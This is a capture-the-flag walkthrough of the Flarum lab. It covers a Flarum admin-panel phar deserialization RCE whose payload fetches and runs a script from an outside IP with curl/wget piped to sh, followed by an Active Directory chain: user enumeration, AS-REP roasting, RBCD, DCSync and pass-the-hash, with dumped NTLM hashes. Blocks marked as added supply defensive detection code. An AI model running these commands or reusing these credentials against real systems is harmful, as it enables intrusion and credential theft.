春秋云镜 - Flarum

Pentesting


flag01

Test the security of the Flarum community admin panel login credentials and obtain the ability to execute arbitrary commands on that server.

www-data

Start with an fscan scan

fscan -h 39.99.138.155

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.99.138.155:80 open
39.99.138.155:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.138.155 code:200 len:5882 title:霄壤社区
已完成 2/2
[*] 扫描结束,耗时: 49.663807s

Only ports 22 and 80 are open, so look at 80 first. Wappalyzer identifies it as a Flarum forum.


There is a known admin-panel RCE, so the question now is how to log in to the admin panel. The challenge description says the credentials are weak.

From the hint on the homepage, the username is administrator and the email is administrator@xiaorang.lab.

With rockyou.txt the password 1chris can be brute-forced (it takes more than ten thousand attempts, which is painful).

Generate the payload with phpggc

./phpggc -p tar -b Monolog/RCE6 system "(curl -fsSL -m180 http://156.238.233.55:39001/slt||wget -T180 -q http://156.238.233.55:39001/slt)|sh"

Then go to Admin -> Appearance -> Custom CSS

Write in @import (inline) 'data:text/css;base64,xxx'; where xxx is the base64 of the generated phar.



Save. Request forum.css to confirm the phar has been written into it; if it is not there yet, you may need to visit the homepage / first so the CSS gets recompiled.

Here we can see it is present.


Then edit the custom CSS again, this time including the forum.css we just modified through the phar:// wrapper

.test {
    content: data-uri('phar://./assets/forum.css');
}


The shell calls back successfully.
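A defender-side check, added here and not part of the writeup, that scans the Flarum custom LESS (the value behind Admin -> Appearance -> Custom CSS) for the two stages used above: an inline base64 import whose payload decodes to a tar/phar archive, and a data-uri()/url() that points at the phar:// wrapper. The sample LESS it scans is constructed in the block.

```python
import base64
import re

# @import (inline) 'data:<mime>;base64,<payload>' as written into Flarum's custom LESS
INLINE_IMPORT_RE = re.compile(
    r"""@import\s*\(inline\)\s*['"]data:[^;'"]*;base64,([A-Za-z0-9+/=\s]+)['"]""")
# data-uri()/url() whose target uses the phar:// stream wrapper
PHAR_REF_RE = re.compile(r"""(?:data-uri|url)\s*\(\s*['"]?(phar://[^)'"]*)""", re.I)
# Strings a phar archive carries regardless of its container format
PHAR_MARKERS = (b"__HALT_COMPILER", b".phar/stub.php", b".phar/.metadata.bin", b".phar/signature.bin")

def looks_like_tar(blob):
    # POSIX ustar magic sits at offset 257 of the first 512-byte header
    return len(blob) >= 512 and blob[257:262] == b"ustar"

def scan_custom_less(less):
    findings = []
    for m in INLINE_IMPORT_RE.finditer(less):
        try:
            blob = base64.b64decode(re.sub(r"\s", "", m.group(1)), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            findings.append(("inline-import-undecodable", ""))
            continue
        markers = [mk.decode() for mk in PHAR_MARKERS if mk in blob]
        if looks_like_tar(blob) or markers:
            findings.append(("inline-import-phar-archive", ",".join(markers) or "ustar"))
    for m in PHAR_REF_RE.finditer(less):
        findings.append(("phar-wrapper-reference", m.group(1)))
    return findings

def constructed_sample():
    # Constructed inputs: a minimal tar-format phar look-alike (one ustar header for
    # .phar/stub.php plus a stub block), the second-stage include, and a benign import.
    header = bytearray(512)
    header[0:15] = b".phar/stub.php\x00"
    header[257:263] = b"ustar\x00"
    payload = bytes(header) + b"<?php __HALT_COMPILER(); ?>\r\n".ljust(512, b"\x00")
    stage1 = "@import (inline) 'data:text/css;base64,%s';" % base64.b64encode(payload).decode()
    stage2 = ".test {\n    content: data-uri('phar://./assets/forum.css');\n}"
    benign = "@import (inline) 'data:text/css;base64,%s';" % base64.b64encode(b"body{margin:0}").decode()
    return stage1, stage2, benign
```

The same scan can be pointed at the compiled assets/forum.css, which is where the inline import lands after Flarum recompiles the LESS.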


We now have www-data privileges, but root is needed to read the flag.

root

Privilege escalation is possible through file capabilities: openssl carries a capability that lets it read the file directly.


flag01: flag{8c0af361-122e-4743-8e78-4594eff3ee60}

Alternatively, as described in this article, start a web server with it and get arbitrary file read that way: Linux提权之:利用capabilities提权 - f_carey - 博客园

flag03

Obtain domain privileges through a Kerberos attack and perform information gathering.

Try to gain control of the Fileserver host on the internal network and find the backdoor the attacker left on the domain controller.

Scan the internal network

./fscan -h 172.22.60.52/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.60.8 is alive
(icmp) Target 172.22.60.15 is alive
(icmp) Target 172.22.60.42 is alive
(icmp) Target 172.22.60.52 is alive
[*] Icmp alive hosts len is: 4
172.22.60.42:445 open
172.22.60.52:80 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.15:445 open
172.22.60.8:445 open
172.22.60.8:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.8:88 open
172.22.60.52:22 open
[*] alive ports len is: 12
start vulscan
[*] NetBios 172.22.60.15 XIAORANG\PC1
[*] NetInfo
[*]172.22.60.8
[->]DC
[->]172.22.60.8
[->]169.254.56.151
[*] NetBios 172.22.60.8 [+] DC:XIAORANG\DC
[*] NetInfo
[*]172.22.60.42
[->]Fileserver
[->]172.22.60.42
[->]169.254.52.194
[*] NetBios 172.22.60.42 XIAORANG\FILESERVER
[*] NetInfo
[*]172.22.60.15
[->]PC1
[->]172.22.60.15
[->]169.254.57.196
[*] WebTitle http://172.22.60.52 code:200 len:5867 title:霄壤社区

Summary:

172.22.60.8 DC:XIAORANG\DC

172.22.60.15 XIAORANG\PC1

172.22.60.42 XIAORANG\FILESERVER

172.22.60.52 the external-facing host (our foothold)

AS-REP Roasting

After finding the database configuration file, connect to the database.


Go through the proxy and connect.


Export the email column of the flarum_users table (the username column works too).


Set this option to none and the export comes out in this form.


Then start domain user enumeration. kerbrute does not seem to work through proxychains here, so copy it to the compromised host and run it there.

./kerbrute_linux_amd64 userenum --dc 172.22.60.8  -d xiaorang.lab flarum_users.txt


That yields 9 valid accounts; use them for the AS-REP Roasting attack.

proxychains -q python3 GetNPUsers.py -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile user.txt


We get two hashes; crack them with hashcat.

hashcat hash.txt rockyou.txt


One password cracks: wangyun\Adm12geC
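Both steps above leave a distinctive trail in the domain controller's Kerberos audit log, so here is an added detection example (not part of the writeup) that runs over constructed 4768 events flattened to key=value lines: GetNPUsers shows up as a successful TGT request with pre-authentication type 0 and an RC4 (0x17) ticket, and kerbrute userenum as one client requesting TGTs for many names the KDC does not know (result code 0x6). The event data and IPs are made up for the demo.

```python
import re
from collections import defaultdict

# Constructed sample events; field names follow the 4768 event's XML data names, values are made up.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=wangyun IpAddress=10.0.0.52 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=zhangxin IpAddress=10.0.0.15 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
EventID=4768 TargetUserName=bob IpAddress=10.0.0.52 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=carol IpAddress=10.0.0.52 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=dave IpAddress=10.0.0.52 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4769 TargetUserName=wangyun IpAddress=10.0.0.15 PreAuthType=- TicketEncryptionType=0x17 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_events(text):
    # One dict per non-empty line; unknown keys are simply carried along
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]

def asrep_roast_candidates(events):
    # A successful TGT request without pre-authentication (PreAuthType 0) for an RC4 ticket
    # (0x17) is exactly what an AS-REP roast of a DONT_REQ_PREAUTH account produces.
    return sorted({(e["TargetUserName"], e["IpAddress"]) for e in events
                   if e.get("EventID") == "4768" and e.get("Status") == "0x0"
                   and e.get("PreAuthType") == "0" and e.get("TicketEncryptionType") == "0x17"})

def user_enum_sources(events, threshold=3):
    # Username enumeration: one source asking for TGTs for many non-existent names,
    # logged as 4768 failures with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN).
    unknown = defaultdict(set)
    for e in events:
        if e.get("EventID") == "4768" and e.get("Status") == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}
```

Accounts that trip the first rule are the ones to re-enable pre-authentication on; the threshold of the second rule should be tuned to the normal rate of typos in the environment.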

Account Operators

Use these credentials to collect domain information

proxychains -q python bloodhound.py -u wangyun -p Adm12geC -d xiaorang.lab -dc DC.xiaorang.lab -ns 172.22.60.8 -c all --auth-method ntlm --dns-tcp --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: DC.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC.xiaorang.lab
INFO: Found 12 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: fileserver.xiaorang.lab
INFO: Querying computer: PC1.xiaorang.lab
INFO: Querying computer: DC.xiaorang.lab
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
INFO: Done in 00M 17S
INFO: Compressing output into 20250311161309_bloodhound.zip


zhangxin@xiaorang.lab is a member of the Account Operators group, but we cannot log in as that user yet.

First check which hosts wangyun can log in to

proxychains -q netexec rdp 172.22.60.52/24 -u wangyun -p Adm12geC
RDP 172.22.60.42 3389 Fileserver [*] Windows 10 or Windows Server 2016 Build 17763 (name:Fileserver) (domain:xiaorang.lab) (nla:True)
RDP 172.22.60.42 3389 Fileserver [-] xiaorang.lab\wangyun:Adm12geC
RDP 172.22.60.8 3389 DC [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:xiaorang.lab) (nla:True)
RDP 172.22.60.15 3389 PC1 [*] Windows 10 or Windows Server 2016 Build 17763 (name:PC1) (domain:xiaorang.lab) (nla:True)
RDP 172.22.60.8 3389 DC [+] xiaorang.lab\wangyun:Adm12geC
RDP 172.22.60.15 3389 PC1 [+] xiaorang.lab\wangyun:Adm12geC (Pwn3d!)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

wangyun can log in to PC1, so RDP in with the account wangyun@xiaorang.lab and password Adm12geC.

There is an Xshell installation on the desktop.


Opening it reveals a saved session containing zhangxin's password, but for some reason I could not open Xshell here.

Use https://github.com/JDArmy/SharpXDecrypt to extract the passwords stored by Xshell.


The password stored in Xshell has been extracted. Next comes an RBCD attack. I used RBCD directly against Fileserver; PC1 would also work, but taking Fileserver first and then coming back to PC1 from the domain controller is more convenient.

Add a machine account

proxychains -q impacket-addcomputer xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass 'Password@973'


Write msDS-AllowedToActOnBehalfOfOtherIdentity on Fileserver$

proxychains -q impacket-rbcd xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'hacker$'

Request a service ticket impersonating Administrator

proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8

Import the ticket

export KRB5CCNAME=Administrator@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache

Edit the hosts file

172.22.60.15 PC1.xiaorang.lab
172.22.60.42 FILESERVER.xiaorang.lab
172.22.60.8 XIAORANG\DC

PTT

proxychains -q python3 smbexec.py -no-pass -k PC1.xiaorang.lab


flag03: flag{6fbc61b2-5328-4b56-a62d-3d22fce75600}

flag04

Try to use the backdoor the attacker left on the domain controller to take control of the DC.

FILESERVER.XIAORANG.LAB holds DCSync rights, which is the backdoor the challenge description refers to.
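Both misconfigurations used in this writeup, the RBCD entry written to msDS-AllowedToActOnBehalfOfOtherIdentity above and the replication rights granted to FILESERVER$ on the domain object, live in Windows security descriptors, so a defender audits them by walking those DACLs. This added example (not from the writeup) parses a self-relative security descriptor with the standard library only and reports RBCD trustees and principals holding either replication extended right; the descriptors and the domain SID are constructed, with RIDs 1114 and 1116 borrowed from the dump below.

```python
import struct
import uuid
# Well-known extended-right GUIDs a DCSync caller needs on the domain object
REPL_GET_CHANGES = uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2")
REPL_GET_CHANGES_ALL = uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100            # access-mask bit that carries extended rights
ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE = 0x00, 0x05
OBJECT_TYPE_PRESENT, INHERITED_OBJECT_TYPE_PRESENT = 0x1, 0x2

def sid_to_bytes(sid):
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def sid_from_bytes(buf, off):
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)

def make_ace(ace_type, mask, sid, object_type=None):
    body = struct.pack("<I", mask)
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
        body += struct.pack("<I", OBJECT_TYPE_PRESENT) + object_type.bytes_le
    body += sid_to_bytes(sid)
    return struct.pack("<BBH", ace_type, 0, 4 + len(body)) + body

def make_sd(aces):
    # Self-relative SECURITY_DESCRIPTOR carrying only a DACL (owner/group/SACL offsets 0)
    body = b"".join(aces)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(body), len(aces), 0) + body
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

def dacl_aces(sd):
    # Yields (ace_type, access_mask, object_type_guid_or_None, trustee_sid) per DACL entry
    dacl_off = struct.unpack_from("<BBHIIII", sd, 0)[6]
    ace_count = struct.unpack_from("<BBHHH", sd, dacl_off)[3]
    pos, out = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, size = struct.unpack_from("<BBH", sd, pos)
        mask = struct.unpack_from("<I", sd, pos + 4)[0]
        cur, obj_type = pos + 8, None
        if ace_type == ACCESS_ALLOWED_OBJECT_ACE:       # object ACE: flags, then optional GUIDs
            flags = struct.unpack_from("<I", sd, cur)[0]
            cur += 4
            if flags & OBJECT_TYPE_PRESENT:
                obj_type, cur = uuid.UUID(bytes_le=bytes(sd[cur:cur + 16])), cur + 16
            if flags & INHERITED_OBJECT_TYPE_PRESENT:
                cur += 16
        out.append((ace_type, mask, obj_type, sid_from_bytes(sd, cur)))
        pos += size
    return out

def rbcd_trustees(sd):   # msDS-AllowedToActOnBehalfOfOtherIdentity: who may impersonate users here
    return [sid for t, _, _, sid in dacl_aces(sd) if t == ACCESS_ALLOWED_ACE]

def dcsync_grants(sd):   # domain-head DACL: who holds a replication extended right
    return [sid for t, mask, obj, sid in dacl_aces(sd) if t == ACCESS_ALLOWED_OBJECT_ACE
            and mask & ADS_RIGHT_DS_CONTROL_ACCESS and obj in (REPL_GET_CHANGES, REPL_GET_CHANGES_ALL)]

# Constructed samples: made-up domain SID, RIDs 1114 (FILESERVER$) and 1116 (hacker$) as in the dump
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
FILESERVER_SID, HACKER_SID = DOMAIN + "-1114", DOMAIN + "-1116"
SAMPLE_RBCD_SD = make_sd([make_ace(ACCESS_ALLOWED_ACE, 0xF01FF, HACKER_SID)])
SAMPLE_DOMAIN_SD = make_sd([make_ace(ACCESS_ALLOWED_OBJECT_ACE, ADS_RIGHT_DS_CONTROL_ACCESS,
                                     FILESERVER_SID, REPL_GET_CHANGES_ALL)])
```

In a real audit the two descriptor blobs come from LDAP (the computer object's msDS-AllowedToActOnBehalfOfOtherIdentity and the domain head's nTSecurityDescriptor); any SID outside the domain controllers and the usual built-in groups in dcsync_grants, or any trustee at all in rbcd_trustees that was not configured on purpose, is the finding.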


Dump FILESERVER's hashes

proxychains -q python3 secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM
0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...)
0010 3E B6 CC 22 FF B7 C5 74 7F E4 B0 AD E7 FA 90 0D >.."...t........
0020 1B 77 20 D5 A6 67 31 E9 9E 38 DD 95 B0 60 32 C4 .w ..g1..8...`2.
0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up...
[*] Stopping service RemoteRegistry

Then dump the domain controller's hashes directly with the machine account

proxychains -q python3  secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes :951d8a9265dfb652f42e5c8c497d70dc -dc-ip 172.22.60.8 -just-dc-ntlm 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:98194d49adfe247020eaade4a3936d95:::
chenfang:1105:aad3b435b51404eeaad3b435b51404ee:302b5743b0f7b3436591aedf550ded5b:::
zhanghao:1106:aad3b435b51404eeaad3b435b51404ee:4c37e7a022daf856bfa2b16824696ab5:::
wangyun:1107:aad3b435b51404eeaad3b435b51404ee:561d64b9a1c943db32810fb5586a4be9:::
zhangwei:1108:aad3b435b51404eeaad3b435b51404ee:3d2f864635abb31f2546dc07cbcd2528:::
wangkai:1109:aad3b435b51404eeaad3b435b51404ee:d20a47a4529552805d96a24c3020384c:::
yangyan:1110:aad3b435b51404eeaad3b435b51404ee:4f80f967fd586f4212bc264a7d1f6789:::
zhangxin:1111:aad3b435b51404eeaad3b435b51404ee:38780e101b28bb9b9036fc3e2e4f35e6:::
wangping:1112:aad3b435b51404eeaad3b435b51404ee:0adf6fb0f808be95d449e3b6c67b02dc:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:ea1a6058127a1d322ced63b59b6d92e5:::
PC1$:1103:aad3b435b51404eeaad3b435b51404ee:57eb8022770c8fb3adadaee4d62c313b:::
FILESERVER$:1114:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
hacker$:1116:aad3b435b51404eeaad3b435b51404ee:ad123012e39b20a80ebe424bff56e1b4:::
[*] Cleaning up...

PTH

proxychains -q python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.8 -codec gbk

type C:\users\administrator\flag\flag04.txt


flag04: flag{f9e06ba0-6108-4123-af9d-3f3a54775d2f}

flag02

PTH

proxychains -q python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.15 -codec gbk

type C:\users\administrator\flag\flag02.txt


flag02: flag{df47b693-f3a8-4ecc-8c23-5437eb2fe0a5}
